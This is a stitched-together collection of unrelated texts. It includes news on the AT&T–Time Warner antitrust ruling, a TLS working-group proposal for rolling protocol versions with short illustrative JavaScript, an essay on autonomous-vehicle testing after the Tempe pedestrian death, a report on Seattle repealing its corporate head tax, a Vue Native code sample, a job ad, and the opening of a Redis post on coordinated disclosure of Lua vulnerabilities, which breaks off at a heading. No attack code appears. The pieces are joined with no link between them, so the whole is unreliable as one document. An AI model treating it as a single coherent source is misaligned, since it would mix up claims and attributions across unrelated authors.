AT&T Cleared by Judge to Buy Time Warner

WASHINGTON — AT&T’s $85.4 billion proposed merger with Time Warner can proceed and does not pose antitrust problems, a federal judge ruled on Tuesday.

U.S. District Judge Richard Leon announced his decision at a hearing at the federal courthouse, gathering all of the parties together for a dramatic coda after a six-week trial.

The decision was definitive, as Leon read from his opinion in the courtroom and concluded that the government had failed to prove that the merger would substantially lessen competition. Time Warner lead attorney Daniel Petrocelli told reporters outside the courthouse that the merger was on track to close June 20.

“We are pleased that, after conducting a full and fair trial on the merits, the Court has categorically rejected the government’s lawsuit to block our merger with Time Warner,” AT&T general counsel David McAtee said in a statement.

The Justice Department has not announced whether it will appeal the case. After he read from his opinion, Leon also strongly suggested that the government not seek a stay pending an appeal.

He said it would be a “manifest injustice” if the government sought a stay to further delay the merger, at a cost to both companies, which face a $500 million breakup fee and a self-imposed June 21 deadline to complete the transaction.

“To use a stay to accomplish indirectly what could not be done directly — especially when it would cause certain irreparable harm to the defendants — simply would be unjust,” Leon said. “I hope and trust that the government will have the good judgment, wisdom and courage to avoid such a manifest injustice.”

Leon also seemed to be urging the government to think twice about even pursuing an appeal. He noted the “staggering cost” of the investigation, litigation and trial, saying that it has “easily” run into tens of millions of dollars for the companies and the government.

Makan Delrahim, the chief of the Antitrust Division, told reporters afterward that he was “disappointed. We obviously don’t agree.” He said they are still reviewing the opinion, which is 170 pages.

The Justice Department’s Antitrust Division challenged the vertical merger by arguing that it would ultimately cost consumers. The crux of the DOJ’s argument was that AT&T-Time Warner would use its increased leverage as a bulked up entity to extract higher carriage fees for channels like TBS, TNT, and CNN.

It also argued that the combined company could prevent AT&T’s rivals from using HBO as a promotional tool, and that the merged conglomerate would have an incentive to coordinate with another big media company, Comcast-NBC Universal, to try to limit the growth of new streaming upstarts.

Leon found those arguments unconvincing.

In his opinion, he seemed to side with AT&T’s defense that, far from withholding Time Warner content from rivals to gain an advantage, the merged company instead would have the incentive to seek maximum carriage of content across an array of platforms.

He also was receptive to AT&T’s case for sizing up the merger in the context of rapid changes in the media landscape, with the rise of Netflix, Google and Amazon as rivals for consumers and advertisers.

He wrote that he could not evaluate the case “without factoring in the dramatic changes that are transforming how consumers view video content.”

As Leon read his opinion in the courtroom, Delrahim and the DOJ’s legal team, led by Craig Conrath, listened intently and did not show any emotion.

Outside the courthouse, at a press conference, Petrocelli told reporters that Leon’s “sweeping rejection does not surprise us at all.”

“The government could present no credible proof in support of its theories,” Petrocelli said, adding that the case “shrunk and shrunk and shrunk until there was nothing there by the end of the day.”

The ruling has tremendous implications for future media mergers, as public interest groups and Wall Street analysts predict that it will clear the way for greater consolidation and combinations between content and distribution.

Comcast, for instance, is weighing a rival bid for many of the assets of 21st Century Fox, hoping to usurp The Walt Disney Co.’s agreement to purchase the media properties. Verizon is seen as likely on the hunt for a key content player, and there has long been speculation that a big tech company, like Google, Apple, or Facebook, would try to acquire a traditional Hollywood studio.

UBS’s John Hodulik wrote last week that a favorable ruling for AT&T could serve as a “green light” for other transactions. “This decision will likely serve as the litmus test for other potential M&A and has broad implications for stocks in the cable, telco, and media space,” he wrote in a research note.

Gene Kimmelman, president and CEO of the public interest group Public Knowledge, said earlier this month that the impact of an AT&T victory in the case will be “enormous.” “You are going to see an explosion of vertical mergers — three or four [companies] that gobble up the most valuable properties in the media ecosystem.”

He also predicted that the tech sector would accelerate its vertical integration, but he doesn’t think that will be via a media company. He described what he saw as a “territorial split,” in which the media sector protects its base through consolidation and tech companies see an opening “to entrench themselves in their current businesses and block out potential rivals.”

Kimmelman doubted that, if AT&T won, the government could obtain a stay to stop the merger from going forward pending an appeal. He noted that the government would likely have to prove both that there was a good chance it would succeed on appeal and that the merger moving forward would cause irreparable harm.

“That is a heavy lift. It may stretch things out somewhat, but I am not sure it will stop the transaction,” Kimmelman said.

Some public interest advocates urged the DOJ to appeal.

“This ruling will open the floodgates, at a minimum, to more vertical mergers of this kind. Comcast will bid for Fox’s assets,” said Gigi Sohn, a former FCC official and fellow at the Georgetown Law Institute for Technology Law & Policy. “Other cable and broadband companies will look to merge with the remaining Hollywood studios and other programmers. Even parties seeking horizontal mergers, like Sprint & T-Mobile, will try to use this decision to justify shrinking competitors in the same market.”

What is unclear is what impact the ruling will have on the Justice Department’s future willingness to challenge vertical transactions. Delrahim told reporters that he would continue to insist that mergers that pose antitrust problems agree to structural solutions, in which properties are divested as conditions of approval. The DOJ did so in this case, insisting that AT&T-Time Warner shed either DirecTV or the Turner networks, but the companies said that doing so would kill the rationale for the deal.

Instead, they said that Turner networks would agree to go into “baseball-style” arbitration with AT&T’s distribution rivals in the event of carriage disputes. A Time Warner spokesman said that they will continue to honor that offer.

AT&T and Time Warner announced an agreement for an $85.4 billion merger on Oct. 22, 2016, but the deal quickly got swept up in the presidential race. Donald Trump said he would block the merger because it was “too much concentration of power in the hands of too few.”

After Trump was elected, many Wall Street analysts believed that the transaction would ultimately pass antitrust scrutiny with a new Republican administration in charge. Before Delrahim was nominated as the new antitrust chief, he said on Canadian TV that he didn’t see the merger as a “major antitrust problem.” Delrahim later noted that in that same interview, he also said that the transaction nevertheless would still raise concerns.

Less than two months after he was confirmed, Delrahim led the Antitrust Division in challenging the transaction in court. The division filed suit on Nov. 20, 2017, claiming that the merger would give AT&T-Time Warner increased leverage against rivals, driving up the prices competitors pay for the Turner networks. It also claimed that the combined company could deny rivals the ability to use HBO, the Time Warner-owned premium service, as a promotional tool to draw subscribers.

AT&T CEO Randall Stephenson fought back, and characterized Trump’s opposition to the transaction and his animosity toward CNN as the “elephant in the room.” In a pretrial hearing, AT&T-Time Warner’s legal team sought to pursue a line of defense that they were unfairly singled out by the DOJ and the White House for antitrust enforcement, given Trump’s attacks on CNN.

Petrocelli told reporters on Tuesday that he had “no insight” on Trump’s role, other than to note that Leon rejected their efforts to seek discovery of White House and Justice Department documents.

Gary Ginsberg, spokesman for Time Warner, was more direct. “The court’s resounding rejection of the government’s arguments is confirmation that this was a case that was baseless, political in its motivation and should never have been brought in the first place,” he said.

The six-week trial — perhaps the most closely watched antitrust case in a generation — featured testimony from Stephenson, Time Warner CEO Jeff Bewkes, and a slew of other corporate executives from the company and from rivals. But much of it hinged on the Justice Department’s ability to prove that the merger would harm consumers.

The DOJ relied on a number of experts to show that pay TV customers would face higher bills — by their account $463 million per year. Chief among them was Carl Shapiro, economist at the University of California at Berkeley, who faced perhaps the most contentious cross-examination from AT&T-Time Warner’s legal team, led by Petrocelli.

Petrocelli attacked Shapiro’s methodology for concluding that the merger would result in a price increase of 45 cents per month per pay TV subscriber. AT&T’s legal team later produced their own witness, Dennis Carlton of the University of Chicago, who claimed that Shapiro’s model was “theoretically unsound.”

Leon, too, found fault in Shapiro’s analysis. At one point during the trial, Leon had called Shapiro’s model a “Rube Goldberg contraption,” and he reiterated that point in his opinion.

“But in fairness to Mr. Goldberg, at least his contraptions would normally move a pea from one side of the room to another,” he wrote in his ruling. “By contrast, the evidence at trial showed that Professor Shapiro’s model lacks both ‘reliability and factual credibility,’ and thus fails to generate probative predictions of future harm” that the government was making.

He wrote that he was left with no “adequate basis to conclude that the challenged merger will lead to any raised costs on the part of distributors and consumers — much less consumer harms that outweigh the conceded $350 million in annual cost savings to AT&T’s customers.”

Enforcing TLS protocol invariants by rolling versions every six weeks

Hi all,

Now that TLS 1.3 is about done, perhaps it is time to reflect on the ossification problems.

TLS is an extensible protocol. TLS 1.3 is backwards-compatible and may be incrementally rolled out in an existing compliant TLS 1.2 deployment. Yet we had problems. Widespread non-compliant servers broke on the TLS 1.3 ClientHello, so versioning moved to supported_versions. Widespread non-compliant middleboxes attempted to parse someone else’s ServerHellos, so the protocol was further hacked to weave through their many defects.

I think I can speak for the working group that we do not want to repeat this adventure again. In general, I think the response to ossification is two-fold:

1. It’s already happened, so how do we progress today?

2. How do we avoid more of this tomorrow?

The workarounds only answer the first question. For the second, TLS 1.3 has a section which spells out a few protocol invariants. It is all corollaries of existing TLS specification text, but hopefully documenting it explicitly will help. But experience has shown specification text is only necessary, not sufficient.

For extensibility problems in servers, we have GREASE. This enforces the key rule in ClientHello processing: ignore unrecognized parameters. GREASE enforces this by filling the ecosystem with them. TLS 1.3’s middlebox woes were different. The key rule is: if you did not produce a ClientHello, you cannot assume that you can parse the response. Analogously, we should fill the ecosystem with such responses. We have an idea, but it is more involved than GREASE, so we are very interested in the TLS community’s feedback.
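
For readers less familiar with GREASE: the reserved values all follow a fixed 0x?A?A pattern, and a client offers one of them at random next to its real parameters. The JavaScript below is only an illustrative sketch of that idea, not how any real TLS stack implements it:

// Illustrative sketch only: the 16 GREASE values reserved for this purpose all
// follow the 0x?A?A pattern, and a client advertises a randomly chosen one
// alongside its real parameters.
const GREASE_VALUES = Array.from({ length: 16 }, (_, i) => {
  const b = (i << 4) | 0x0a;   // 0x0a, 0x1a, ..., 0xfa
  return (b << 8) | b;         // 0x0a0a, 0x1a1a, ..., 0xfafa
});

function pickGreaseValue() {
  return GREASE_VALUES[Math.floor(Math.random() * GREASE_VALUES.length)];
}

// A compliant peer must ignore the unknown value; a broken one that chokes on
// it gets flushed out before a real extension ever needs the code point.
const offeredVersions = [pickGreaseValue(), 0x0304 /* TLS 1.3 */, 0x0303 /* TLS 1.2 */];
console.log(offeredVersions.map(v => '0x' + v.toString(16).padStart(4, '0')));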

In short, we plan to regularly mint new TLS versions (and likely other sensitive parameters such as extensions), roughly every six weeks matching Chrome’s release cycle. Chrome, Google servers, and any other deployment that wishes to participate, would support two (or more) versions of TLS 1.3: the standard stable 0x0304, and a rolling alternate version. Every six weeks, we would randomly pick a new code point. These versions will otherwise be identical to TLS 1.3, save maybe minor details to separate keys and exercise allowed syntax changes. The goal is to pave the way for future versions of TLS by simulating them (“draft negative one”).
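
As a rough sketch of what “randomly pick a new code point” could look like in practice, the selection below avoids the official 0x03xx version space and the GREASE pattern, consistent with the safeguards listed further down. The rule and constants are assumptions for illustration, not the actual scheme:

// Hypothetical rolling-version picker; the avoidance rules here are
// illustrative assumptions, not the scheme actually deployed.
function pickRollingVersionCodePoint() {
  for (;;) {
    const candidate = Math.floor(Math.random() * 0x10000);     // any 2-byte value
    const inOfficialVersionSpace = (candidate >> 8) === 0x03;  // 0x03xx: SSL 3.0 / TLS
    const lowByte = candidate & 0xff;
    const highByte = (candidate >> 8) & 0xff;
    const isGrease = lowByte === highByte && (lowByte & 0x0f) === 0x0a; // 0x?A?A
    if (!inOfficialVersionSpace && !isGrease) return candidate;
  }
}

// Each six-week release would publish one such value, e.g.:
console.log('0x' + pickRollingVersionCodePoint().toString(16).padStart(4, '0'));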

Of course, this scheme has some risk. It grabs code points everywhere. Code points are plentiful, but we do sometimes have collisions (e.g. 26 and 40). The entire point is to serve and maintain TLS’s extensibility, so we certainly do not wish to hamper it! Thus we have some safeguards in mind:

* We will document every code point we use and what it refers to. (If the volume is fine, we can email them to the list each time.) New allocations can always avoid the lost numbers. At a rate of one every 6 weeks, it will take over 7,000 years to exhaust everything.

* We will avoid picking numbers that the IETF is likely to allocate, to reduce the chance of collision. Rolling versions will not start with 0x03, rolling cipher suites or extensions will not be contiguous with existing blocks, etc.

* BoringSSL will not enable this by default. We will only enable it where we can shut it back off. On our servers, we of course regularly deploy changes. Chrome is also regularly updated and, moreover, we will gate it on our server-controlled field trials mechanism. We hope that, in practice, only the last several code points will be in use at a time.

* Our clients would only support the most recent set of rolling parameters, and our servers the last handful. As each value will be short-lived, the ecosystem is unlikely to rely on them as de facto standards. Conversely, like other extensions, implementations without them will still interoperate fine. We would never offer a rolling parameter without the corresponding stable one.

* If this ultimately does not work, we can stop at any time and only have wasted a small portion of code points.

* Finally, if the working group is open to it, these values could be summarized in regular documents to reserve them, so that they are ultimately reflected in the registries. A new document every six weeks is probably impractical, but we can batch them up.

We are interested in the community’s feedback on this proposal—anyone who might participate, better safeguards, or thoughts on the mechanism as a whole. We hope it will help the working group evolve its protocols more smoothly in the future.

The Menace and the Promise of Autonomous Vehicles

Jacob Silverman | Longreads | June 2018 | 10 minutes (2,419 words)

In Tempe, Arizona, on the cool late-winter night of March 18, Elaine Herzberg, a 49-year-old homeless woman, stepped out onto Mill Avenue. A new moon hung in the sky, providing little illumination. Mill Avenue is a multi-lane road, and Herzberg was walking a bike across it; plastic bags with some of her few possessions were dangling from the handlebars. Out of the darkness, an Uber-owned Volvo XC90 SUV, traveling northbound, approached at 39 miles per hour and struck Herzberg. The Uber came to an unceremonious stop, an ambulance was called, and she died later in a hospital. The car had been in autonomous mode.

At least two Tesla drivers have died while behind the wheel of a car on autopilot, but Herzberg was the first pedestrian fatality of an autonomous vehicle, or AV. Her death is more than a grim historical fact. It is an unfortunate milestone in one of technology’s great utopian projects: the deployment of AVs throughout society. As an economic effort, it may be revolutionary—driver is one of the most common professions in the United States, and some of the most significant AV initiatives center on making taxis and freight trucks self-driving. As a safety measure, AVs promise to eliminate some 35,000 deaths each year, which are blamed on driver error. While computers are, of course, prone to make mistakes—and vulnerable to hacking—the driverless future, we are told, will feature far less danger than the auto landscape to which we’ve been accustomed. To get there, though, more people are going to die. “The reality is there will be mistakes along the way,” James Lentz, the CEO of Toyota North America, said at a public event after Herzberg was killed. “A hundred or 500 or a thousand people could lose their lives in accidents like we’ve seen in Arizona.” That week, the company announced that it would pause AV testing on public roads. Recently, when I asked if Toyota has calculated how many casualties it expects to cause in pursuit of AVs, a spokesperson replied that the company is focused on reducing the number of fatalities at the hands of human drivers: “Our goal in developing advanced automated technologies is to someday create a vehicle incapable of causing a crash.”

Implied in these remarks is the notion that deaths like Herzberg’s are the price of progress. Following the accident, Uber temporarily halted public AV testing, though it plans to resume in the coming months, just not in Arizona. (Volvo has kept mum, while several companies that contribute self-driving technology to Uber’s vehicles—Nvidia, Mobileye, Velodyne—have claimed that their features were deployed improperly, placing blame on Uber.) An Uber spokesperson told me that the company is cooperating with an investigation by the National Transportation Safety Board and examining its testing process: “We have initiated a top-to-bottom safety review of our self-driving vehicles program, and we have brought on former NTSB Chair Christopher Hart to advise us on our overall safety culture.” But what does it mean to experiment with technologies that we know will kill people, even if the promised results would save lives?

***

Autonomous vehicles are seeing machines. With sensors, cameras, and radars harvesting petabytes of data, they try to read and make sense of their surroundings—to perceive lanes, trees, traffic lights. According to a preliminary NTSB report, the car that hit Herzberg initially registered her “as an unknown object, as a vehicle, and then as a bicycle.” With 1.3 seconds until impact, the car’s system decided to make “an emergency braking maneuver,” but Uber had disabled the Volvo’s emergency braking mechanism, hoping to avoid a herky-jerky ride. “The vehicle operator is relied on to intervene and take action,” the report notes, but “the system is not designed to alert the operator.” In the Volvo that night, there was a human backup driver behind the wheel, but she was looking down at a screen, relaying data, so she didn’t see Herzberg in time to take over.

Like the algorithms that power Google Search or Facebook’s newsfeed, AV decision-making mostly remains the stuff of proprietary trade secrets. But the NTSB investigation and other reportage help sketch a picture of why Uber’s systems failed that night in Tempe: After the accident, Reuters reported that Uber had decreased the number of LIDAR (laser-based radar) modules on its vehicles and removed a safety driver (previously, there had been two—one to sit behind the wheel and another to monitor data). These details aren’t necessarily inculpatory, but they seem to suggest an innovate-at-all-costs operation that puts little emphasis on safety.

To conduct testing, the AV industry has quietly—even covertly—spread from private tracks to public roads across the country. A patchwork of municipal, state, and federal regulations means that, while important research is underway in dozens of states, it can be difficult to glean where cars are going and what safety standards are in place. Aiming to lure innovators, Arizona, Texas, and Michigan have competed to provide the lightest regulatory touch. In 2016, after California established a comparatively robust set of AV regulations, Doug Ducey, the governor of Arizona, told Uber, “California may not want you, but we do.” Google’s Waymo and General Motors arrived, too. Ducey encouraged the start of an AV pilot program before the public was informed—Herzberg was probably unaware that these companies were testing in her community when she was hit—and weeks before the crash he issued an executive order explicitly allowing driverless vehicles on city streets. The order set rules making companies liable for criminally negligent fatalities, yet Sylvia Moir, Tempe’s police chief, said that the company would likely not be at fault in the accident; Ducey quickly banned Uber from testing AVs in his state, but hundreds of other self-driving cars are still on the road.

On the federal level, there has not been much scrutiny of how AVs operate. The AV Start Act, a bill that would encourage AV testing with minimal federal oversight, has been held up by Democratic senators who worry it doesn’t do enough to address safety concerns. The NTSB has established a scale to measure autonomous functions, ranging from 0 to 5 (with 5 being a car so self-directed that it doesn’t have a steering wheel). But most policy decisions have fallen to state legislatures and industry-friendly governors. Unlike pharmaceutical research, which has stringent standards, Silicon Valley’s products are commonly seen as inherently beneficial, and AV companies seem to have carte blanche to test their inventions.

If autonomous vehicles are a technological inevitability, how do we know when they’ve arrived?

This regulatory free-for-all has led to a host of questions from concerned citizens and transportation advocates. Matters of liability have not been standardized, which leaves open who should be responsible when an AV crashes—the owner, the manufacturer, the insurer? (Uber has already settled with some of Herzberg’s relatives.) What of the companies whose hardware and software are combined in an AV’s complicated systems? How does a robo-taxi ensure customer compliance, and how might it deal with someone who doesn’t pay or refuses to get out of a car? Should police have the ability to take control of AVs, forcing them to pull over? More broadly, if autonomous vehicles are a technological inevitability, how do we know when they’ve arrived?

Without clear rules—or sufficient data—it may be up to the market to decide on AV standards. Manufacturers like Mercedes are testing levels of autonomy, offering more computer-assisted cruise control and parking features, for instance, without asking drivers to surrender their full attention. In models reliant on a computer’s discretion, however, customers may soon be able to choose between a utilitarian vehicle that will maximize good for all, or a “self-protective” one that will preserve the passengers’ safety at all costs. Which can you afford? Someone’s life may depend on the answer.

***

That Uber’s AV didn’t see Herzberg, a homeless woman, as a human being makes a kind of perverse sense, since AVs—especially robo-taxis—weren’t made for people like her. Neither were the sprawling cities like Tempe where these cars are being tested. Besides their inviting regulatory environments, these areas were chosen because of their open road systems, good weather, and few cyclists and pedestrians. At a time when urbanists are preaching multi-modal mobility, from bikes to buses, AVs are a kind of throwback, making streets less accommodating to anyone on foot; by increasing the number of cars—particularly passenger-free delivery vehicles—they tend to worsen traffic and pollution. And even if the auto industry could develop an impossibly perfect algorithm for safety, widespread AV adoption would require massive road infrastructure upgrades to fix lane lines and embed communication beacons; faulty GPS systems, outdated maps, surveillance and privacy challenges, cybersecurity flaws, bandwidth limits, and expensive hardware would all be vexing.

Despite all this, Thomas Bamonte, who works as a senior program manager for AVs at the North Central Texas council of governments, is optimistic. When we spoke, he told me about Drive.ai, a company that recently announced it would launch a pilot fleet of AVs in the city of Frisco. Drive.ai’s service doesn’t much resemble an Uber robo-taxi, he explained: The vehicles are Nissan vans, limited to roaming around a small commercial district during daylight hours; to make them stand out, they have been painted bright orange with a wavy blue stripe bearing the words “Self-Driving Vehicle.” The vans are also equipped with screens that signal when passengers are boarding and when it’s safe to walk past. And they will, at least at first, feature human safety drivers.

The Drive.ai program lacks the ambition of, say, Waymo’s Phoenix-area AV service, which ferries passengers around without a human driver ready to take the wheel, but the project—publicly announced, small in scope, conducted in partnership with city officials—seems to take a more measured approach to AV testing than exists elsewhere. Bamonte described Frisco’s AV program as “kind of crawl, walk, run.”

“We don’t want developers to just plop down unannounced and start doing a service,” Bamonte told me. He compared the Drive.ai testing favorably to Tesla’s, whose cars have ambitious autopilot features that have already been deployed in thousands of commercial vehicles, wherever drivers take them. So far, Tesla’s autopilot mode has caused several high-profile crashes on public roads, including fatal accidents in Florida and California. The Uber crash has “added note of caution,” Bamonte said, but “it’s our responsibility to continue to explore and test this technology in a responsible way.” For him, that means closed tracks and computer simulations; after conducting a public education campaign and soliciting feedback, deployment on public streets will inevitably follow. To learn if these cars can work for us, we have to put them in real-world conditions, he explained. “You just can’t do that in a laboratory.”

***

Central to AV testing is the “trolley question,” based on a scenario in which a runaway trolley threatens to fatally run over a crowd — unless someone can pull a lever, redirecting the trolley onto another track, where a single person is standing. No matter what happens, this thought experiment proffers, someone is going to die. It’s up to us to choose. With AV testing, that decision ostensibly lies within software. At stake is whether cars can be adequately programmed to select the lesser of two evils: swerving to avoid a crowd of pedestrians if it means killing one pedestrian or the vehicle’s passenger. In a 2016 paper, “The Social Dilemma of Autonomous Vehicles,” three scientists examined public trust in that decision-making process. In a survey of about 2,000 people, most respondents liked the idea of an AV sacrificing itself to save others; but as passengers, they said they would want the car to preserve their own safety no matter what. “To align moral algorithms with human values,” the researchers advised, “we must start a collective discussion about the ethics of AVs — that is, the moral algorithms that we are willing to accept as citizens and to be subjected to as car owners.”

The study’s authors worried that mandating utilitarian AVs—those that would swerve to avoid a crowd—through federal regulation would present a confounding problem: passengers would never agree to be rationally self-sacrificing. “Regulation could substantially delay the adoption of AVs,” they wrote, “which means that the lives saved by making millions of AVs utilitarian may be outnumbered by the deaths caused by delaying.” Things get even more complicated in what are called edge cases, in which an AV may face a variety of thorny weather, traffic, and other conditions at once, forcing a series of complex rapid-fire decisions. The report concludes, “There seems to be no easy way to design algorithms that would reconcile moral values and personal self-interest.”

Programming morality into our vehicles is a matter of deeper, almost mystical complexity.

Azim Shariff—one of the paper’s authors and a professor at the University of California, Irvine—has called for “a new social contract” for AVs. Riding in one will mean giving yourself over to a machine whose “mind” humans don’t understand—and which, in a moment of crisis, may be programmed to prioritize the lives of others over your own. “I’ve kind of wracked my brain to think of another consumer product which would purposefully put their owners at risk against their wishes,” he told me. “It’s really a radically new situation.”

In practice, Shariff went on, cars are unlikely to be faced by stark choices. The trolley question is meant to emblematize tough decision-making for the purpose of moral deliberation; programming morality into our vehicles is a matter of deeper, almost mystical complexity. “The cars are going to have to be choosing in the maneuvers that they make to slightly increase the risk toward a pedestrian rather than the passenger, or slightly increase the risk toward somebody who’s walking illegally versus someone who’s walking legally,” he said. That’s a fraction of a percent here or there. “Only at the aggregate level, with all the cars driving all the miles, will you then see the statistical version of these scenarios emerge.”

It will take billions of miles—and some unknown number of people killed—to gauge whether, by a statistically significant margin, AVs are safer than human-driven cars. For now, there is mostly speculation and experimentation. The death of Elaine Herzberg is “a new data point,” according to Jensen Huang, the CEO of Nvidia, which makes chips for self-driving systems. “We don’t know that we would do anything different, but we should give ourselves time to see if we can learn from that incident,” he said. “It won’t take long.”

***

Jacob Silverman is the author of Terms of Service: Social Media and the Price of Constant Connection.

***

Editor: Betsy Morais
Fact-checker: Ethan Chiel

Seattle officials repeal tax on large companies

Seattle officials scuttled a corporate tax on Tuesday that they had wholeheartedly endorsed just a month ago, delivering a win for the measure’s biggest opponent — Amazon — and offering a warning to cities bidding for the retailer’s second headquarters that the company would go to the limit to get its way.

The tax would have raised about $50 million a year to help the homeless and fund affordable housing projects. As Seattle has boomed over the last decade, in large part because of Amazon, which is based there, rents have soared and some residents have suffered. The city’s homeless population is the third largest in the country, after New York and Los Angeles.

Taxing successful companies to help alleviate some of the problems that their success caused was such a compelling idea that it was quickly taken up in Silicon Valley itself. California cities like Cupertino, East Palo Alto, Mountain View and San Francisco have recently explored various forms of a head tax, under which large employers in each town would be charged a fee per employee.

But in Seattle, the notion has proved extraordinarily contentious, culminating in the abrupt reversal on Tuesday.

The Seattle City Council repealed the tax in a 7-to-2 vote that was accompanied by large doses of acrimony and despair. The crowd was standing room only, with some carrying posters that said “Tax Amazon Not Working People” while others supported repeal. The council members extended the comment period in a fruitless attempt to accommodate everyone. At least one Amazon employee spoke in favor of the tax, saying, “I want all kinds of people in this city, not just rich people.”

Less than a month ago, the tax had passed unanimously. It was signed into law on May 16 by Jenny A. Durkan, Seattle’s mayor, who said the money would “move people off the street and into safer places” and “clean up the garbage and needles that are in our parks and in our communities,” as well as provide resources including job training and health services.

“I know we can be a city that continues to invent the future and come together to build a more affordable, inclusive and just future,” she said.

Within days, that vision was in tatters. Amazon, which had already succeeded in watering down the original tax after halting expansion plans in protest, joined other Seattle-based corporate interests such as Starbucks, the Microsoft co-founder Paul Allen’s investment firm Vulcan and local food and grocery firms. All showed they would fight the law, and at least some residents took their side.

The opponents funded No Tax on Jobs, an effort aimed at getting enough signatures to put a repeal on the November ballot. It became obvious over the weekend that the measure would succeed in coming before voters, leading Ms. Durkan and seven council members to issue a statement saying, “We heard you.”

The politicians had no stomach for a protracted battle over jobs, even at a moment when the area’s unemployment rate is only 3.1 percent. “It is clear that the ordinance will lead to a prolonged, expensive political fight over the next five months that will do nothing to tackle our urgent housing and homelessness crisis,” they said.

An Amazon spokesman called the vote “the right decision.” A Starbucks spokesman said, “We welcome this move.”

Mike O’Brien, a council member, said in an interview before the vote, “I have a couple of bad choices and I’m picking the less bad,” meaning a vote to repeal.

He was puzzled by the intensity and the virulence of the opposition. “This tax is not a perfect tool, but I think it’s a good one,” he said. “When I’m out there talking to the community, I hear they’ve been convinced by Amazon and other business leaders that this would be bad.”

Teresa Mosqueda, one of the two council members opposing the repeal, said there was no backup plan for dealing with the homeless situation.

“We don’t have a path forward,” she said. “I share the frustration with all the City Council that we have been out-messaged.”

Kshama Sawant, the other opponent of repeal on the council, called the vote “both capitulation and betrayal.”

“They are choosing to base themselves on making Amazon executives happy,” she said. That “is the biggest lesson that should reverberate to other cities as well.”

The city’s initial plan was for the tax to collect about $500 per employee a year. Amazon responded in early May by stopping its expansion in the city “pending the outcome of the head tax vote.” That was sufficient to get the tax knocked down to about $275 per employee and scaled back in other ways. The tax was limited to companies with at least $20 million in revenue a year.

As the largest private employer in the city, with more than 45,000 local workers, Amazon would have had to pay initially about $12 million a year — a relative pittance for a company with revenue last year of $178 billion and whose chief executive, Jeff Bezos, the richest man in the world, said recently that the only thing he could think of to spend his fortune on was space travel.

Amazon officials have said the company is not against helping the homeless. But it thinks Seattle would just waste the money it raised. The city, the company believes, “has a spending efficiency problem.”

The retailer selected 20 finalists in January as possible sites for its new second headquarters, a process that has generated an enormous amount of attention and interest, even by Amazon’s standards. It has indicated that the community that won the right to as many as 50,000 new jobs would have to be an accommodating partner. Some of the finalists have offered extraordinary tax breaks.

In recent months, however, there has been the beginning of a resistance to the notion that what is good for Amazon is inevitably good for its host.

“From coast to coast, people lose their homes and get displaced from their communities even as the biggest corporations earn record profits and development booms,” said Sarah Johnson, director of Local Progress, a national association of progressive elected municipal officials. “Elected officials across the country are paying close attention to how Amazon and other corporations have responded to Seattle’s efforts to confront their affordable housing and homelessness crisis.”

Especially, it seems, in Silicon Valley itself, where both problems run deep.

Last week, the Mountain View City Council voted unanimously to proceed with plans to put a head-count tax on the ballot in November. Mountain View is home to Google, among other tech companies. The tax would raise about $6 million, half of it from Google, and be used for transit projects.

“We have needs we need to meet,” said Lenny Siegel, the city’s mayor. “And we look to see where there’s the most money. Most of our companies have money. We’re trying to find a way for them to invest it that helps them and the community.”

Vue Native

Quick hello world Example

<template>
  <view class="container">
    <text class="text-color-primary">{{message}}</text>
  </view>
</template>

<script>
export default {
  data: function() {
    return {
      message: "Hello World"
    };
  }
};
</script>

<style>
.container {
  flex: 1;
  background-color: white;
  align-items: center;
  justify-content: center;
}
.text-color-primary {
  color: blue;
  font-size: 30;
}
</style>

Atrium W18 (Democratizing Legal Services) Is Hiring a Sr. Software Eng – BackEnd

Atrium is a data-driven law firm designed to make access to corporate legal services transparent and price-predictable for everyone. We're doing this by building the first structured data platform for organizational data. We use modern techniques for extracting data that is locked away in legal documents, modeling how best to store this information, and inventing new ways for lawyers and paralegals to interact with the resulting structured data to help advise clients.

Atrium LTS ("Legal Technology Services") technology provides a better experience for legal clients than they previously thought possible, increasing communication and speed of service.

As a Senior Software Engineer - Back End, you will have a unique opportunity to be a technical lead on a team of full stack and machine learning engineers working to build a data platform that serves as the foundation for a suite of innovative legal tools and services used by lawyers, companies, and internal teams. Your work will be the bridge between the product and machine learning teams, providing the skeleton of our data platform. We are using cutting-edge technology to classify, extract text from, and intelligently summarize exclusive legal documents and emails. We are a fast-growing company with leadership opportunities available to you as the team continues to expand.

Mininet on OpenBSD: Interactive SDN Testing and Development [pdf]

Redis Lua scripting: several security vulnerabilities fixed

A bit more than one month ago I received an email from the Apple Information Security team. During an audit, the Apple team found a security issue in the Redis Lua subsystem, specifically in the cmsgpack library. The library is not part of Lua itself; it is an implementation of MessagePack I wrote myself. In the course of merging a pull request improving the feature set, a security issue was added. Later the same team found a new issue in the Lua struct library; again, that library is not part of Lua itself, at least in the release of Lua we use: we just embedded the source code inside our Lua implementation in order to provide some functionality to the Lua interpreter that is available to Redis users. Then I found another issue in the same struct package, and later the Alibaba team found many other issues in cmsgpack and other code paths using the Lua API. In a short amount of time I was sitting on a pile of Lua related vulnerabilities.

Those vulnerabilities are mostly relevant in the specific case of providing managed Redis servers on the cloud, because it is very unlikely that the vulnerabilities discovered can be used without direct access to the Redis server: many Redis users don’t use the cmsgpack or the struct package at all, and those who do will very unlikely feed them with untrusted input. However for cloud providers things are different: they have Redis instances, sometimes in multi tenancy setups, exposed to the user that subscribed for the service. She or he can send anything to such Redis instances, triggering the vulnerabilities, corrupting the memory, and potentially taking total control of the Redis process.

For instance, this simple Python program can crash Redis using one of the cmsgpack vulnerabilities [1].

[1] https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

However from the point of view of normal Redis users that control what is sent to their instances, the risk is limited to feeding untrusted data to a function like struct.unpack(), after selecting a particularly dangerous decoding format “bc0” in the format argument.

# Coordinating the advisory

Thanks to the cooperation and friendly communications between the Apple Information Security team, me, and the Redis cloud providers, I tried to coordinate the disclosure of the vulnerabilities after contacting all the major Redis providers out there, so that they could patch their systems before the bugs were published. I provided a single patch, so that the providers could easily apply it to their systems. Finally, between yesterday and today I prepared new patch releases of Redis 3, 4 and 5, with the security fixes included. They are all already released if you are reading this blog post. Unfortunately I was not able to contact smaller or newer cloud providers. The effort to handle the communication with Redis Labs, Amazon, Alibaba, Microsoft, Google, Heroku, Open Redis and Redis Green was already massive, and the risk of leaks would have been even higher had the information been shared with more subjects (every company included many persons handling the process). I’m sorry if you are a Redis provider finding out about this vulnerability just today; I tried to do my best.

I want to say thank you to the Apple Information Security team and all the other providers for the hints and help about this issue.

# The problem with Lua

